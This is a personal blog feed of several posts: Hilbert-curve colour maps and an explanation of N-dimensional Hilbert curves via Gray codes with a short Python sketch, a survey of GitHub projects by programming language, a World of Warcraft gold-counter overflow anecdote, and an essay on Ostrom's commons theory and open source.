space-filling curves 2010-01-07T00:00:00+00:00 2010-01-07T00:00:00+00:00 https://corte.si/posts/code/hilbert/swatches/ <p>After my post about my <a href="https://corte.si/posts/code/hilbert/portrait/">Quixotic quest to draw a portrait of the Hilbert curve</a>, Chris Mueller pointed me to some <a rel="external" href="http://visualmotive.com/colorsort/">fascinating related work</a> he had done generating colour maps of images. Chris's method was to extract the colours from an image, sort them in natural order, and then draw the pixels out onto a Hilbert curve. 
The results are pretty, but have a blotchiness that demonstrates the poor clustering properties of a natural order sort nicely. If you've read my previous post (you have, haven't you?), you'll be immediately struck by the idea that we can improve this by sorting the pixels in order of the 3d Hilbert curve traversal of the RGB colour cube (you were, weren't you?). This would give us near optimal clustering, keeping similar colours together and eliminating the blotchiness. If we have a Hilbert-order sorting of the pixels, we can also project this onto other traversals of the pixels of the destination image. Using the ZigZag curve I introduced in the previous post produces a very nice result too, showing that the order in which the RGB cube is traversed is more important than the destination map.</p> <p>In the images below, <strong>natural</strong> is a natural-order colour sort projected onto a Hilbert curve (Chris's method), <strong>hilbert</strong> is a Hilbert-curve order colour sort projected onto a Hilbert curve, and <strong>zigzag</strong> is a Hilbert-curve order colour sort projected onto a ZigZag curve. 
I've used the same images Chris used to make comparison with his other interesting visualisations easy.</p> <div class="media left"> <a href="original_candleslime.png"> <img src="original_candleslime.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_candleslime.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_candleslime.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_candleslime.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_girlpeach.png"> <img src="original_girlpeach.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_girlpeach.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_girlpeach.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_girlpeach.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_landscape.png"> <img src="original_landscape.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_landscape.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_landscape.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_landscape.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_tents.png"> <img src="original_tents.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_tents.png"/> <div>natural</div> </div> <div class="column"> <img src="hilbert_tents.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_tents.png"/> <div>zigzag</div> </div> </div> </div> <div class="media left"> <a href="original_tigersnack.png"> <img src="original_tigersnack.png" /> </a> </div><div class="content"> <div class="row"> <div class="column"> <img src="natural_tigersnack.png"/> <div>natural</div> </div> <div class="column"> <img 
src="hilbert_tigersnack.png"/> <div>hilbert</div> </div> <div class="column"> <img src="zigzag_tigersnack.png"/> <div>zigzag</div> </div> </div> </div> <h2 id="sources">Sources</h2> <p>The images are from the Flickr Creative Commons collection. The tiger image is © <a rel="external" href="http://www.flickr.com/photos/nikonvscanon/2427517125/">David Blaikie</a>. The girl image is © <a rel="external" href="http://www.flickr.com/photos/savannahgrandfather/312427606/">Bruce Tuten</a>. The still life is © <a rel="external" href="http://www.flickr.com/photos/8363028@N08/3077370592/in/photostream/">DeusXFlorida</a>. The beach image is © <a rel="external" href="http://www.flickr.com/photos/hamed/2476599906/">Hamed Saber</a>. The tent image is © <a rel="external" href="http://www.flickr.com/photos/drusbi/1318108463/">drusbi</a>.</p> <h2 id="the-code">The code</h2> <p>I've updated the <a rel="external" href="http://github.com/cortesi/scurve">scurve</a> project (where I'm collecting algorithms and visualisation tools related to space-filling curves) to include a "colormap" tool to generate colour maps. 
The images above can be generated using commands of the following form:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;"> colormap</span><span style="color: #005CC5;"> -s 128 -c</span><span> [colour</span><span style="color: #032F62;"> traversal]</span><span style="color: #005CC5;"> -m</span><span> [map] src destination</span></span></code></pre> <p>There are a lot of other striking permutations and combinations to explore - the colour traversal and destination map can be any of the space-filling curves supported by <strong>scurve</strong>.</p> Portrait of the Hilbert curve 2010-01-03T00:00:00+00:00 2010-01-03T00:00:00+00:00 https://corte.si/posts/code/hilbert/portrait/ <div class="media"> <a href="hilbert2d-o4.png"> <img src="hilbert2d-o4.png" /> </a> <div class="subtitle"> Hilbert curve of order 4 </div> </div> <p>The <a rel="external" href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert curve</a> is a remarkable construct in many ways, but the thing that makes it <em>useful</em> in computer science is the fact that it has good clustering properties. If we take a curve like the one above and straighten it out, points that are close together in the two-dimensional layout will also tend to be close together in the linear sequence. I say "tend to be", because we can never get this perfectly right - we can show that any curve of this type will have some points that are close to each other spatially but far from each other on the curve. 
<a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.37.3138&amp;rep=rep1&amp;type=pdf">It</a> <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.129.1888&amp;rep=rep1&amp;type=pdf">turns</a> <a rel="external" href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.24.8236&amp;rep=rep1&amp;type=pdf">out</a>, however, that the clustering behaviour of the Hilbert curve is pretty much as good as we can currently get. For one example of how this property can be useful, imagine that we have a database with two indexes - X and Y. We know that we will be doing frequent queries on those indexes, asking for records where X and Y fall within specified ranges. We can visualise this as retrieving rectangular regions from a two-dimensional space. Given this scenario, how can we lay out the records on disk to minimise disk access? Information on disk is stored sequentially, so what we want is a layout that maximises the likelihood that records in any given rectangular region will also be adjacent on disk. In other words, what we want is a way to order our two-dimensional space of records so that records close to each other in two dimensions also tend to be close to each other in the sequential order. This is exactly the outstanding property of the Hilbert curve, so one solution is to store our records on disk in Hilbert order.</p> <h2 id="visualising-the-hilbert-curve-a-first-stab">Visualising the Hilbert curve: A first stab</h2> <p>I've long felt that the usual visualisation of the Hilbert curve - like the one shown at the top of this post - doesn't really do its clustering properties justice. The lines-and-vertices approach demonstrates how to <em>construct</em> the curve very nicely, but it doesn't give us any intuitive feel for how close points on the curve are to each other on the plane. 
In the remainder of this post, I take a stab at visualising the Hilbert curve as the great mathematician in the sky intended - completely covering the plane, and with each pixel visually encoding its proximity to its neighbours along the curve.</p> <p>One way to proceed would be to find a way to assign a colour to every pixel in a Hilbert-order traversal of a square image. Imagine the RGB colour space as a cube where each colour is uniquely identified by a set of (r, g, b) co-ordinates. Here's one with 20 colours to a side:</p> <div class="media"> <a href="ccube.png"> <img src="ccube.png" /> </a> <div class="subtitle"> A 20x20x20 RGB colour cube </div> </div> <p>We'll use a somewhat larger colour cube - 256 colours to a side, giving us 16 777 216 unique colours. This colour cube is familiar to pretty much everyone, since it's precisely the colour space we use when we specify HTML-style #rrggbb colours. We can project the RGB colour cube at 1:1 resolution onto a square with 4096 pixels to a side - this exactly matches a Hilbert curve of order 12. Now we need a method for traversing the colours in the colour cube. One trivial way to do this is to simply snake through all the points in the cube. In two dimensions, it would look like this:</p> <div class="media"> <a href="zigzag-o4.png"> <img src="zigzag-o4.png" /> </a> <div class="subtitle"> 16x16 Zigzag </div> </div> <p>This generalises to 3 or more dimensions easily - just imagine "stacking" plates of two-dimensional traversals in such a way that one plate's end point is adjacent to the next plate's starting point. For want of a better term, I've called this Zigzag order. When we project a Zigzag traversal of the RGB colour space onto a Hilbert-order traversal of the plane, we get this:</p> <div class="media"> <a href="hilbert-zigzag-fullsize.png"> <img src="hilbert-zigzag-small.png" /> </a> <div class="subtitle"> Zigzag on Hilbert </div> </div> <p>That's... ugly. 
You can vaguely make out the shape of the Hilbert curve by dividing the image into quadrants, and traversing them in the order in which they blend into each other. But there's a problem - if we traverse the RGB colour space in Zigzag order, many colours that are close to each other in 3d space - and therefore visually similar - are quite far from each other in our traversal order. This is what causes the blotchy artifacts in the image above. What we really want is a traversal of the RGB colour space that is as smooth and continuous as possible - meaning that colours that are close to each other in the cube are also as close as possible to each other in the traversal order. Wait a minute... that sounds familiar, doesn't it?</p> <h2 id="drawing-the-hilbert-curve-in-n-dimensions">Drawing the Hilbert curve in N dimensions</h2> <p>What we really want is a 3d Hilbert curve traversal of the RGB colour cube. This would mean that our colour clustering - making sure that similar colours are as close as possible to each other in the sequence - would be close to optimal. We should then see the clustering properties of the 2d Hilbert curve as patches of similar colour. So, does a 3d analogue to the Hilbert curve exist? Sure it does - here's a somewhat befuddling picture of an example rendered with POV-Ray:</p> <div class="media"> <a href="hilbert3d-o3.png"> <img src="hilbert3d-o3.png" /> </a> <div class="subtitle"> 3d Hilbert curve of order 3 - the green bulb is the start of the curve </div> </div> <p>We can do even better than 3 dimensions, though, by generalising the Hilbert curve to N dimensions. Concretely, we would like to find a way to translate an offset along the N-dimensional Hilbert curve to co-ordinates, and vice-versa. The algorithms to do this are somewhat tricky, but are well known and widely described. 
A particularly nice exposition can be found in the paper <a rel="external" href="http://www.cs.dal.ca/research/techreports/cs-2006-07">"Compact Hilbert Indices"</a> by Chris Hamilton. This section is based on Hamilton's version of the classic algorithm first devised by A. R. Butz in the 1970s (though, see comments in my code for corrections to some minor errors in the paper that may trip up implementers).</p> <p>We start with a slight detour - the surprising connection between the Hilbert curve and <a rel="external" href="http://en.wikipedia.org/wiki/Gray_code">Gray codes</a>. Recall that Gray codes are a way to traverse all numbers of a given bit width in such a way that only one bit differs from each value to the next. Here, for example, are the 2-bit and 3-bit Gray codes:</p> <h3 id="2-bit">2-bit</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>0, 0</span></span> <span class="giallo-l"><span>0, 1</span></span> <span class="giallo-l"><span>1, 1</span></span> <span class="giallo-l"><span>1, 0</span></span></code></pre><h3 id="3-bit">3-bit</h3> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>0, 0, 0</span></span> <span class="giallo-l"><span>0, 0, 1</span></span> <span class="giallo-l"><span>0, 1, 1</span></span> <span class="giallo-l"><span>0, 1, 0</span></span> <span class="giallo-l"><span>1, 1, 0</span></span> <span class="giallo-l"><span>1, 1, 1</span></span> <span class="giallo-l"><span>1, 0, 1</span></span> <span class="giallo-l"><span>1, 0, 0</span></span></code></pre> <p>Now, watch what happens when we treat each set of bits in the N-bit Gray code as co-ordinates in N-dimensional space (with X being the rightmost bit), and draw the resulting curves:</p> <table class="spacertable"> <tr> <th width="50%"> 2-bit </th> <th> 3-bit </th> </tr> <tr> <td valign="top"> <img src="hilbert2d-o1.png" alt="Hilbert 2d O1"/> 
</td> <td valign="top"> <img src="hilbert3d-o1.png" alt="Hilbert 3d O1"/> </td> </tr> </table> <p>Voila, the Order 1 Hilbert curves in 2 and 3 dimensions! A bit of pondering shows that this generalises to any dimension - if we have a hypercube with dimensions 1x1x1..., the Gray code will traverse all the vertices of the cube by changing only one dimension at a time. Specifically, we can say that the N-bit Gray code is a Hilbert order traversal of the vertices of an N-dimensional hypercube. Effectively, this means that we can now draw the Order 1 Hilbert curve for any dimension - so let's refresh our memories of how the Order 1 curve relates to the higher orders.</p> <table class="spacertable"> <tr> <th> O1 </th> <th> O2 </th> <th> O3 </th> </tr> <tr> <td> <img src="hilbert2d-o1-marked.png" alt="Hilbert 2d O1"/> </td> <td> <img src="hilbert2d-o2-marked.png" alt="Hilbert 2d O2"/> </td> <td> <img src="hilbert2d-o3-marked.png" alt="Hilbert 2d O3"/> </td> </tr> </table> <p>Notice that as we move from one order to the next, we replace each vertex with a sub-curve that has the same shape as the <strong>O1</strong> traversal. I've marked one path through this recursive process in the images above, showing the subcurve for the upper-left vertex in every step of the recursion. At every step, we also need to transform the subcurve through rotation and reflection to make sure that its start matches the end of the previous subcurve, and its end matches the beginning of the next subcurve. This process generalises trivially to N dimensions. Since the <strong>O1</strong> curve is just a Gray code traversal of the N-dimensional cube, we can think of the Order M Hilbert curve as a collection of hypercubes nested M deep.</p> <p>Now, let's see if we can use this construction process to figure out the co-ordinates of a point, given the offset along the Hilbert curve. We'll ignore the rotations and reflections for the moment. 
We start with the <strong>O1</strong> curve of dimension N, and the N most significant bits of the offset. By checking which vertex of the hypercube this maps to, we can peel off the most significant bit of each co-ordinate. For example, if we wanted to locate offset 63 in the 2-dimensional Order 3 curve (the upper-left corner), our first two bits would be (1, 1). This is the fourth point in the Gray code traversal of the hypercube, which gives us the upper-left quadrant of the <strong>O1</strong> cube. We now know that the most significant bit of our X co-ordinate is 0, and the most significant bit of our Y co-ordinate is 1. Doing the same thing for the matching sub-hypercube in the <strong>O2</strong> curve will give us the next bit, and we can drill down through the hypercubes in this way peeling off one bit of each co-ordinate, until we have all M bits. This process also works in reverse - if we start with a set of co-ordinates, we can drill down through the hypercubes, determining N bits of the curve offset at every step. So, generally, at every step of the Gray code recursion we get a nested hypercube of dimension N, and N bits of co-ordinate or offset information. Finally, we need to deal with the rotations and reflections required to make the heads and tails of the Gray code subcurves match up. We'll need to perform this transformation at every step, before we extract our information bits. All we need is a way to rotate and reflect a given hypercube to make its beginning and end match up with its position on the curve. The transform required turns out to map to a simple set of bit operations described in Section 2.3.1 of Hamilton's paper.</p> <p>And that's it - using this general process, we can now calculate co-ordinates or offsets for points on an N-dimensional Hilbert curve. Hopefully, I've managed to give some intuition for how this algorithm works, but I've glossed over pretty much all the details. 
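</p> <p>The first step of that drill-down (before any rotations or reflections are applied) can be sketched in a few lines of Python. This is only an illustration, not the code from Hamilton's paper or from scurve: the helper names <code>gray</code>, <code>vertex</code> and <code>gray_sequence</code> are made up for this example, and it assumes the standard binary-reflected Gray code, which reproduces the 2-bit and 3-bit listings above.</p>

```python
def gray(i):
    """Return the i-th value of the binary-reflected Gray code."""
    return i ^ (i >> 1)


def vertex(i, n):
    """Co-ordinates of the i-th vertex visited on the n-dimensional O1 curve.

    The rightmost Gray code bit is taken as X, the next as Y, and so on,
    so the result is ordered (X, Y, ...).
    """
    g = gray(i)
    return tuple((g >> axis) % 2 for axis in range(n))


def gray_sequence(n):
    """All n-bit Gray codes as bit strings, most significant bit first."""
    return [format(gray(i), "0{}b".format(n)) for i in range(2 ** n)]


# The 2-bit and 3-bit sequences listed earlier in the post.
print(gray_sequence(2))
print(gray_sequence(3))

# Worked example: offset 63 on the 2-dimensional Order 3 curve.
# The offset has six bits; the two most significant select the O1 vertex.
top_bits = 63 >> 4
print(top_bits, vertex(top_bits, 2))
```

<p>The last line prints <code>3 (0, 1)</code>: the top two bits of the offset pick the fourth point of the Gray code traversal, whose X bit is 0 and whose Y bit is 1, matching the upper-left quadrant in the worked example. The rotation and reflection step is deliberately left out of this sketch.</p> <p>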
See the original paper or the code I'm publishing for specifics. I should also note in passing that this is just one way to draw the Hilbert curve - at higher dimensions there are many, many different well-formed Hilbert curves.</p> <h2 id="a-portrait-of-the-hilbert-curve-as-a-young-fruit-salad">A portrait of the Hilbert curve as a young fruit salad</h2> <p>At last we are in a position to traverse the 3-dimensional RGB cube in Hilbert order, and have another stab at visualising the 2d Hilbert curve.</p> <div class="media"> <a href="hilbert-hilbert-fullsize.png"> <img src="hilbert-hilbert-small.png" /> </a> <div class="subtitle"> Hilbert on Hilbert </div> </div> <p>Ladies and gentlemen, I present a Hilbert curve traversal of the three-dimensional RGB colour space, projected onto a two-dimensional Hilbert curve covering the plane. I think it's absolutely damn beautiful. Like some weird piece of abstract art - a Kandinsky or perhaps a Pollock - the more you look at this image, the more structure you see. If you divide it into quadrants, and sub-quadrants, and sub-sub-quadrants, you can trace the path of the Hilbert curve at every level of recursion by following the flow of colours (use the 2d Hilbert curves elsewhere in this post for reference if you're having trouble). If you're looking at the full-size image, this works even at very large magnifications, until the human ability to perceive colour differences starts to fail. Incredibly, this image contains <em>exactly</em> the same set of colours as the unattractive Zigzag visualisation at the start of the post - the only difference is the way the colours are arranged. This is so remarkable that you might want to verify this yourself using the colour analysis functionality of your favourite image editor (make sure you use the full-size images for best effect). 
We've also achieved the goal we set out with - the clustering properties of the 2d Hilbert curve are directly visible as patches of similar colour.</p> <p>By the way - if Hilbert curves float your boat, you may also be interested in a previous post of mine, in which I <a href="https://corte.si/posts/code/hilbert/explorer/">visualise an IP geolocation database with Hilbert curves</a>.</p> <h2 id="the-code">The code</h2> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">git</span><span style="color: #032F62;"> clone git://github.com/cortesi/scurve.git</span></span></code></pre> <p>I've released the code used to render the images in this article as a Python project called <a rel="external" href="http://github.com/cortesi/scurve">scurve</a> (for space-filling curve). This project aims to be a collection of clear implementations of algorithms related to space-filling curves, together with a set of tools for visualising them. If you're interested in this kind of thing keep an eye on the project - I plan to add more interesting goodies in the next few weeks.</p> The impact of language choice on github projects 2009-12-15T00:00:00+00:00 2009-12-15T00:00:00+00:00 https://corte.si/posts/code/devsurvey/ <p>Although I spend a lot of my play-time fooling about with other languages, my professional and released code consists of Python, C, C++ and, alas, Javascript. I've lived in this tiny corner of the magic garden of modern software development for 10 years, and I'm itching to strike out in a different direction for my next project. With this in mind, I've started to wonder about the impact of language choice on the development process. Are there major differences between projects in different languages? Is it possible to quantify these differences? I decided to try to gather some hard numbers. 
I started by writing a small script to watch the <a rel="external" href="http://github.com/timeline">public timeline</a> on <a rel="external" href="http://www.github.com">github</a>. Over a period of weeks, I collected a list of about 30 thousand active projects. Using the github API, I eliminated projects with fewer than 3 watchers, on the basis that these are likely to be small personal repositories like dotfiles, programming exercises and so forth. After this, I was left with some 5000 repositories, which I checked out, giving me about 55G of data to work with. The next step was to analyse the data, extracting commits, committers and line counts for each file type contained in each project. Lastly, I got rid of duplicate projects by looking for matching commit hashes. From start to end, this process took more than a week to complete. The end result is a database consisting of 3 400 repositories, 20 000 authors, and 1.5 million commits. I'm releasing the dataset for others to play with - see the bottom of this post for information.</p> <p>The rest of this post takes a basic look at the numbers for 12 languages. I had to leave some out for lack of data. Haskell, for example, didn't make the cut with only 18 projects. Ah, well.</p> <p>Let's look at the numbers.</p> <h2 id="the-basics">The Basics</h2> <p>Let's start with a quick overview of the basics of the dataset.</p> <div class="media"> <a href="samplesize.png"> <img src="samplesize.png" /> </a> <div class="subtitle"> Sample size </div> </div> <p>First, the sample size. Clearly, github is very popular with the Ruby crowd, with more than four times as many projects as Python, the runner-up. 
The sample sizes for C#, Erlang and Scala are pretty small, so the results for these languages aren't as firm as for the others.</p> <div class="media"> <a href="median_contributors.png"> <img src="median_contributors.png" /> </a> <div class="subtitle"> Median contributors </div> </div> <p>This graph shows the median number of contributors to projects in each language. The red line here and in the graphs below is the median for all projects in the dataset. <strong>Most projects have around 3 contributors, with Perl and Java projects having about 5, and Javascript and Objective C around 2</strong>.</p> <div class="media"> <a href="median_commits.png"> <img src="median_commits.png" /> </a> <div class="subtitle"> Median commits </div> </div> <p>Here we see the median number of commits for projects in each language - in some senses, we can view this as a proxy for project age. <strong>Most projects have around 75 commits.</strong> The Perl and C++ data, however, seems significant - projects in these languages on average have a much longer commit history. I suspect that this is due to a decline in popularity in these languages. Recall that I collected data only for projects that had recent commits. If fewer new projects are created in C++ and Perl, we would expect projects in these languages to be older, on average.</p> <div class="media"> <a href="median_commitsize.png"> <img src="median_commitsize.png" /> </a> <div class="subtitle"> Median commit size </div> </div> <p>This chart shows the median commit size, in lines of code. We take the total commit size to be the sum of lines inserted and the lines deleted, as reported by "git log --shortstat". <strong>Most commits touch around 19 lines of code</strong>. The C# outlier is probably due to the small sample set. 
I suspect that the differences in this graph are a reflection of basic language verbosity, with Objective C, C++ and Java being more verbose, and Perl, Python and Ruby being less so.</p> <div class="media"> <a href="median_commit_files.png"> <img src="median_commit_files.png" /> </a> <div class="subtitle"> Median files touched per commit </div> </div> <p><strong>Most commits touch about 4 files, with C++ touching somewhat more, and Perl, Python and Ruby somewhat less.</strong> The C# outlier is probably due to small sample size.</p> <h2 id="the-contributors">The Contributors</h2> <div class="media"> <a href="median_commits_per_contributor.png"> <img src="median_commits_per_contributor.png" /> </a> <div class="subtitle"> Median commits per contributor </div> </div> <p>This shows the median number of commits contributors make. <strong> The average contributor contributes about 5 commits to a project. C, Objective C and Ruby developers contribute somewhat less, PHP, C#, Java and Javascript developers somewhat more.</strong> I suspect the results for C and Ruby are due to projects in these languages receiving more one-off contributions.</p> <p>An average of only 5 commits - that's not much. Let's look at this from a different perspective - graphing the percentage of the total commits to a project made by contributors.</p> <div class="media"> <a href="author_commit_quantile.png"> <img src="author_commit_quantile.png" /> </a> <div class="subtitle"> % commits vs % contributors </div> </div> <p>The percentage of commits by contributors is shown on the Y axis, and the matching f-value on the X axis. An f-value of 25 is the bottom <a rel="external" href="http://en.wikipedia.org/wiki/Quartile">quartile</a>, 50 is the median, and 75 is the upper quartile. Looking at the Python graph, for example, we can see that the bottom 75% of contributors provided a bit less than 20% of the commits. 
The shape of these graphs gives us our first take-away: <strong>For all languages, a small fraction of the committers do the vast majority of the work.</strong> This won't be news to anyone in the Open Source community. More interesting, though, is the fact that <strong>C, C++ and Perl projects are significantly more "top-heavy" than those in other languages, with a smaller core of contributors doing more of the work.</strong></p> <h2 id="how-projects-evolve">How projects evolve</h2> <div class="media"> <a href="contributorsXcommits.png"> <img src="contributorsXcommits.png" /> </a> <div class="subtitle"> Contributors vs Commits </div> </div> <p>This dot plot shows the total number of contributors vs the total number of commits for each project. I've restricted the X and Y values - we're effectively looking at the bottom-left corner of a larger dataset. The red line is a <a rel="external" href="http://en.wikipedia.org/wiki/Local_regression">loess</a> fitted curve. Over a large number of projects, we can consider the number of commits to be a measure of time - the graph effectively shows how quickly projects tend to accumulate contributors over their lifespan. <strong>Ruby projects recruit contributors astoundingly well, with Python a close second. Java, Javascript and PHP projects, on the other hand, do particularly badly.</strong> The fact that the fitted curve is a nice straight line with a consistent slope shows that these results hold for young and old projects alike. Note that the Scala data is not significant - that nice straight line is an extrapolation by the curve fitting algorithm, which is not backed up by information.</p> <div class="media"> <a href="commit_age.png"> <img src="commit_age.png" /> </a> <div class="subtitle"> Commit age </div> </div> <p>This graph shows the number of commits per day, over the first 300 days of a project's life. To prevent skew, I only included projects that are 300 days or older. The red line is a smoothed curve. 
<strong>C and Perl projects show a marked decline in activity over their first year.</strong> I suspect that the Perl result is due to the fact that it becomes harder and harder to contribute to a Perl codebase, the bigger it gets. The C result is more of a mystery.</p> <h2 id="the-silly">The Silly</h2> <p>And now for something silly.</p> <div class="media"> <a href="swearwords.png"> <img src="swearwords.png" /> </a> <div class="subtitle"> Swearwords per 1000 commits </div> </div> <p>This shows the number of swearwords used per 1000 commits. Objective C and Perl programmers are the most foul-mouthed. Java coders are more restrained, possibly because the language is more corporate, and they're afraid of having their pay docked.</p> <h2 id="the-caveats">The Caveats</h2> <p>There are all sorts of reasons why you should take all of this with a grain of salt. There are many factors that make github projects atypical - not least of which is the use of Git for source control. The way that I collected data skews the dataset in favor of projects with recent commits - unfortunately dead projects aren't included. I detected a project's primary language purely based on line count by file extension. Due to the large number of projects that include Javascript libraries in their repos wholesale, I had to apply a fudge-factor weighting to .js files to get reasonably sensible results.</p> <h2 id="you-can-play-too">You can play too</h2> <p>I had fun playing with this dataset, and I've barely scratched the surface of what could be done with it. I'll probably squeeze another blog post or two out of the data, but in the meantime, I'm making the full database available so people can point out the many mistakes and shortcomings of my analysis. 
At the time of writing, I still have the checked out repositories, so if you have suggestions for refinements or expansions to the data, let me know.</p> <p>You can check the database out <a rel="external" href="http://github.com/cortesi/devsurvey">here</a>. Be warned, though - it's about 100mb of data.</p> Overflowing World of Warcraft's gold counter 2009-12-11T00:00:00+00:00 2009-12-11T00:00:00+00:00 https://corte.si/posts/wow/beating-the-bank/ <div class="media"> <a href="overflow.jpg"> <img src="overflow.jpg" /> </a> <div class="subtitle"> Bank Overflow </div> </div> <p>It's a little known fact, but my only vice... Well, one of my <em>few</em> vices... Cough. <em>Amongst my vices</em> is the fact that I play <a rel="external" href="http://www.worldofwarcraft.com/">World of Warcraft</a> with a small group of real-life friends. As WoW habits go, mine is a very mild one - I don't often have time to play more than one night a week. On the one night I do have, I want to raid, not grind for gold to service endless repair bills. Irked by my situation, I did what any red-blooded programmer would do. I wrote some code to collect information on auction house price movements, analysed my data, and implemented a Secret Trading Strategy in the form of a Super Secret Addon (which operates, of course, entirely within WoW's terms of service). This has been successful beyond the wildest dreams of avarice - I spend about 5 minutes a day buying and selling the auctions recommended by the SSA, and I make enough to bankroll my entire guild.</p> <p>In fact, I just noticed that I have managed to overflow the "Total gold acquired" counter in my stats tab. Turns out that WoW stores this figure as a 32-bit signed integer, expressed in copper. 
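</p> <p>To see where such a counter runs out, here is a rough sketch in Python. It is an illustration only and says nothing about WoW's actual code: it assumes a two's-complement 32-bit counter and the usual conversion of 100 copper to a silver and 100 silver to a gold, and the names <code>wrap_int32</code> and <code>COPPER_PER_GOLD</code> are invented for the example.</p>

```python
COPPER_PER_GOLD = 100 * 100  # assumed: 100 copper per silver, 100 silver per gold
INT32_MAX = 2 ** 31 - 1      # largest value a signed 32-bit integer can hold


def wrap_int32(value):
    """Interpret an arbitrary integer as a two's-complement signed 32-bit value."""
    value %= 2 ** 32
    if value >= 2 ** 31:
        return value - 2 ** 32
    return value


# Whole gold that fits in the counter before it wraps.
print(INT32_MAX // COPPER_PER_GOLD)

# One copper past the limit flips the total to the most negative value.
print(wrap_int32(INT32_MAX + 1))
```

<p>Under those assumptions the counter holds 214 748 whole gold, and the next copper past the limit turns the total into -2147483648.</p> <p>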
WoW now thinks I've earned -1981224360 copper in total, something that can be achieved by earning more than 230 000 gold.</p> Elinor Ostrom, the commons problem and Open Source 2009-12-10T00:00:00+00:00 2009-12-10T00:00:00+00:00 https://corte.si/posts/opensource/ostrom/ <div class="media"> <a href="bigstump.jpg"> <img src="bigstump.jpg" /> </a> <div class="subtitle"> Logging in Tasmania </div> </div> <p>In 1968, <a rel="external" href="http://en.wikipedia.org/wiki/Garrett_Hardin">Garrett Hardin</a> coined the term <a rel="external" href="http://www.sciencemag.org/cgi/content/full/162/3859/1243">"Tragedy of the Commons"</a> to describe the economic mechanism that drives humans to destroy common resources. The tragedy applies whenever a common resource is "subtractable" - that is, if use of a resource subtracts from it, making what's been extracted unavailable to others. While the full benefit of appropriating the resource goes to the user, the cost is shared among everyone. The consequence is that for a self-interested user of the resource, the benefits of increasing use will always outweigh the costs, even if the resource is ultimately destroyed in the process. Central to this is the problem of freeloaders - even if the vast majority of users use a resource sustainably, a small number of opportunistic freeloaders can quickly soak up the common benefit. The conventional economic view - first expressed by Hardin himself - is that there are two ways to solve the commons problem: privatising the resource so an owner with a direct interest can govern its use, or imposing regulation from "outside" the system. It's interesting to see, then, that this year's Nobel Prize in Economics went to <a rel="external" href="http://en.wikipedia.org/wiki/Elinor_Ostrom">Elinor Ostrom</a>, someone who has made a name arguing against this fatalistic conclusion. 
Ostrom and her collaborators have produced a huge literature studying commons that follow a third path - consensual, self-generated governance that limits use to sustainable levels.</p> <p>At the heart of Ostrom's work is a simple question - how does self-governance arise? She approaches this problem with a simple equation describing the cost-benefit analysis of an individual considering whether to participate in communal governance. I've modified it slightly for this post - you can find the original in the paper <a rel="external" href="http://www.scielo.br/pdf/asoc/n10/16883.pdf">"Reformulating the Commons"</a>:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>BN &gt; BE + C</span></span></code></pre> <p><strong>BN</strong> is the benefit derived under a new (presumably communal) governance strategy, <strong>BE</strong> is the benefit derived under the existing (presumably non-communal) strategy, and <strong>C</strong> is the cost associated with switching. It's as simple as that: the benefit of participating has to exceed the cost. In essence, Ostrom's work on the commons explores the panoply of ways in which communities encourage participation in commons governance by modifying this equation through rewards, penalties and social norms. There's no single successful strategy, and the ones that do work rely on concepts like trust, reciprocity, and the types of institutional structures and individuals involved. Additional complexity comes from the interactions between subsets of users - the equation can be different for every user, and coalitions and factions are common. The huge diversity of solutions means that Ostrom's work is dirtier and more empirical than much of economics, and certainly far removed from the world of identical rational actors in Hardin's original analysis.</p> <p>It's interesting to consider how this line of thought applies to Open Source projects. 
Software is not a classical <a rel="external" href="http://en.wikipedia.org/wiki/Common_pool_resource">common pool resource</a>, because it's not subtractable - there's no cost to the users or developers of a project if I choose to use it. Nonetheless, an Open Source project is definitely a commons, in the sense that it is a community resource that thrives or starves depending on contributions from its members. The participants in this type of commons are the pool of potential contributors, rather than the pool of potential appropriators. In the same way that using a common pool resource applies a shared penalty to everyone, a contribution to the software commons benefits everyone. This type of non-subtractive (additive?) commons has its own version of the freeloader problem - it pays for a contributor to hang back and wait for someone else to add a needed feature, rather than go to the expense of adding it themselves. If the contributor is a company, it might be beneficial to maintain a competitive advantage by not contributing a change back to the community, even if the work has already been done. Open Source projects face an inverted form of the commons problem, which can be expressed in a modified version of Ostrom's commons equation:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>BC &gt; BN + C</span></span></code></pre> <p>Here, <strong>BC</strong> is the benefit of contributing, which has to outweigh the cost of contributing (<strong>C</strong>) plus the benefit of not contributing (<strong>BN</strong>). The Open Source world has produced an immensely sophisticated set of norms and institutions around the terms of this equation, resulting in some of the most successful self-governance structures on the planet. 
